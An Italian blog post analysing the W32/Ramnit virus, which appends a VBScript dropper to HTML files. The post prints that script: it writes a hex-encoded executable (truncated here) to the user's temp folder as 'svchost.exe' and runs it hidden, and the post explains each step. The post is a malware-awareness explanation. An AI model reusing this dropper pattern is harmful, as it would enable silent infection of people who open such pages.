Virus che attacca un eseguibile ai file HTML

Sembra una delle tante leggende metropolitane, come quella del virus che si annidava nella memoria di configurazione del PC, invece è possibile.

Il virus in questione è W32/Ramnit che infetta file EXE, DLL e HTML.

Un volta caricato in memoria il virus accoda ai file HTML questo codice VBScript:
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000...0000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End
If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0
//--></SCRIPT>

Il codice qui sopra scrive un file SVCHOST.EXE (un nome che non desta sospetti se visto nel task manager di Windows) nella directory temporanea dell’utente prendendo il contenuto dalla variabile WriteData, che contiene il carico di infezione vero e proprio (notare che i primi due byte sono il magic number dei Portable Executable). Se la scrittura va a buon fine, lo script tenta di eseguire il file.

È vero: non è così immediato il fatto che ogni file HTML infettato diventi un vettore di infezione, ma questo è un ulteriore esempio di come file apparentemente innocui possano essere utilizzati per diffondere del malware. (via TrustedSource)

Autore: Luigi Rosa

Consulente IT, sviluppatore, SysAdmin, cazzaro, e, ovviamente, geek.

Spazio per un commento